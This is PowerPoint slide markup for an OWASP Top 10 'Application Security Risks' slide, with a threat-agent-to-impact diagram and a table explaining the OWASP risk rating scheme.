          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2680936" y="2088380"/>
              <a:ext cx="870752"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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Weaknesses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581012" y="2088380"/>
              <a:ext cx="716864"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Technical</a:t>
              </a:r>
            </a:p>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sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5760742" y="2088380"/>
              <a:ext cx="697628"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Business</a:t>
              </a:r>
            </a:p>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sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3352800"/>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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="29241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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="33813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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="34861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Asset</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 250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Function</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="26860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Asset</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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sp>
            <p:nvSpPr>
              <p:cNvPr id="6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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="211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sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="247650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85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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733799" y="291465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85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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="3810000"/>
              <a:ext cx="457200" cy="3810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85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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="86"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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="44026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2" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="269"/>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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="265"/>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4" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="238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20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="242873"/>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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="233348"/>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58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="20480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33" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="419100"/>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88" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="709597"/>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91" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="897466"/>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0" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="265"/>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7" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="633428"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3624935" y="2090853"/>
              <a:ext cx="659155"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Security</a:t>
              </a:r>
              <a:b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Controls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17"/>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en-US" sz="4000" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 177"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1555573859"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="4183200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risk?</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847575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> focuses on identifying the most serious web application security risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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In this edition, we have updated the risk rating system to assist in calculating the likelihood and impact of any given risk. For more details, please see </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1"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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Note About Risks</a:t>
                      </a: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p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="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Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a content management system (CMS) for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts can be very different for the same software. It is critical to understand the risk to your organization based on applicable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none"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threat agents and business impacts.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1"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0"/>
                        </a:spcAft>
                      </a:pP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Where possible, the names of the risks in the Top 10 are aligned with </a:t>
                      </a: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7"/>
                        </a:rPr>
                        <a:t>Common Weakness Enumeration </a:t>
                      </a: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(CWE) weaknesses to promote generally accepted naming conventions and to reduce confusion. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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2" name="Table 71"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3032219579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="6102170"/>
          <a:ext cx="4388400" cy="1021080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="810000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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Threat</a:t>
                      </a:r>
                    </a:p>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Agents</a:t>
                      </a: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Exploitability</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Weakness Prevalence</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Weakness Detectability</a:t>
                      </a:r>
                      <a:endPar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Technical Impacts</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Business Impacts</a:t>
                      </a:r>
                      <a:endPar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152400">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50" b="1"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Appli-cation Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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46800" marR="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sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Easy: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Widespread: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Easy: </a:t>
                      </a:r>
                      <a:r>
